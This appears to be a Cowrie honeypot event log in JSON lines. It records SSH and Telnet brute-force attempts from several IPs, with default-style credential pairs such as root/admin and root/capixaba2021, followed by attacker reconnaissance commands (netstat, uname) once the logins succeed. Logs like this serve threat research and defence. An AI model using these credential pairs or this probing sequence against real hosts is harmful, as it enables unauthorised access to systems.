{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.770029Z","src_ip":"212.227.235.229","session":"8e74a030c4bd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:06.790612Z","src_ip":"212.227.125.160","session":"852c649fb4cf"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:23:11.752243Z","src_ip":"212.227.235.229","session":"8e74a030c4bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37596,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d81fcdae368","protocol":"telnet","message":"New connection: 212.227.125.160:37596 (1.2.3.4:23) [session: 7d81fcdae368]","sensor":"my-vps","timestamp":"2025-08-31T03:23:12.892139Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:23:12.976053Z","src_ip":"212.227.125.160","session":"7d81fcdae368"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:23:12.990921Z","src_ip":"212.227.125.160","session":"7d81fcdae368"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:13.653674Z","src_ip":"212.227.235.229","session":"8e74a030c4bd"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60398,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fcbcaf806d6","protocol":"ssh","message":"New connection: 41.226.27.251:60398 (1.2.3.4:22) [session: 8fcbcaf806d6]","sensor":"my-vps","timestamp":"2025-08-31T03:23:17.679015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:17.684345Z","src_ip":"41.226.27.251","session":"8fcbcaf806d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:17.722204Z","src_ip":"41.226.27.251","session":"8fcbcaf806d6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:23:17.892620Z","src_ip":"41.226.27.251","session":"8fcbcaf806d6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:19.111830Z","src_ip":"41.226.27.251","session":"8fcbcaf806d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49116,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0c2cdc76545","protocol":"ssh","message":"New connection: 212.227.125.160:49116 (1.2.3.4:22) [session: e0c2cdc76545]","sensor":"my-vps","timestamp":"2025-08-31T03:23:26.944746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:28.057988Z","src_ip":"212.227.125.160","session":"e0c2cdc76545"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:23:28.058976Z","src_ip":"212.227.125.160","session":"e0c2cdc76545"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:23:29.807134Z","src_ip":"212.227.125.160","session":"e0c2cdc76545"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:31.336259Z","src_ip":"212.227.125.160","session":"e0c2cdc76545"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36610,"dst_ip":"1.2.3.4","dst_port":22,"session":"3342ed1ec200","protocol":"ssh","message":"New connection: 41.226.27.251:36610 (1.2.3.4:22) [session: 3342ed1ec200]","sensor":"my-vps","timestamp":"2025-08-31T03:23:37.921836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:37.938032Z","src_ip":"41.226.27.251","session":"3342ed1ec200"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:37.969598Z","src_ip":"41.226.27.251","session":"3342ed1ec200"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:23:38.160278Z","src_ip":"41.226.27.251","session":"3342ed1ec200"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53672,"dst_ip":"1.2.3.4","dst_port":22,"session":"627df075bc50","protocol":"ssh","message":"New connection: 212.227.125.160:53672 (1.2.3.4:22) [session: 627df075bc50]","sensor":"my-vps","timestamp":"2025-08-31T03:23:38.392076Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:39.416702Z","src_ip":"41.226.27.251","session":"3342ed1ec200"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:23:40.830970Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51454,"dst_ip":"1.2.3.4","dst_port":22,"session":"d73a022560e1","protocol":"ssh","message":"New connection: 212.227.125.160:51454 (1.2.3.4:22) [session: d73a022560e1]","sensor":"my-vps","timestamp":"2025-08-31T03:23:44.758380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:45.583302Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:45.584012Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:50.147016Z","src_ip":"212.227.125.160","session":"627df075bc50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:50.148033Z","src_ip":"212.227.125.160","session":"627df075bc50"}
{"eventid":"cowrie.login.success","username":"root","password":"capixaba2021","message":"login attempt [root/capixaba2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:23:50.881217Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:23:54.148700Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:23:54.149407Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:56.134777Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:56.135970Z","src_ip":"212.227.125.160","session":"d73a022560e1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":48886,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5e7905beaad","protocol":"ssh","message":"New connection: 41.226.27.251:48886 (1.2.3.4:22) [session: f5e7905beaad]","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.363716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.364354Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.414313Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.563197Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:23:58.682913Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.683786Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.734793Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:23:58.735766Z","src_ip":"41.226.27.251","session":"f5e7905beaad"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50736,"dst_ip":"1.2.3.4","dst_port":22,"session":"6671a831e55d","protocol":"ssh","message":"New connection: 201.148.180.50:50736 (1.2.3.4:22) [session: 6671a831e55d]","sensor":"my-vps","timestamp":"2025-08-31T03:24:03.552914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:04.590571Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38868,"dst_ip":"1.2.3.4","dst_port":22,"session":"06eb89fea863","protocol":"ssh","message":"New connection: 212.227.235.229:38868 (1.2.3.4:22) [session: 06eb89fea863]","sensor":"my-vps","timestamp":"2025-08-31T03:24:05.404971Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:05.579180Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:06.197232Z","src_ip":"212.227.235.229","session":"06eb89fea863"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:24:06.198418Z","src_ip":"212.227.235.229","session":"06eb89fea863"}
{"eventid":"cowrie.login.success","username":"root","password":"capixaba2021","message":"login attempt [root/capixaba2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:24:09.645240Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234567","message":"login attempt [guest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:12.133447Z","src_ip":"212.227.235.229","session":"06eb89fea863"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:24:12.905386Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-31T03:24:12.906121Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:14.019679Z","src_ip":"212.227.235.229","session":"06eb89fea863"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:14.746036Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
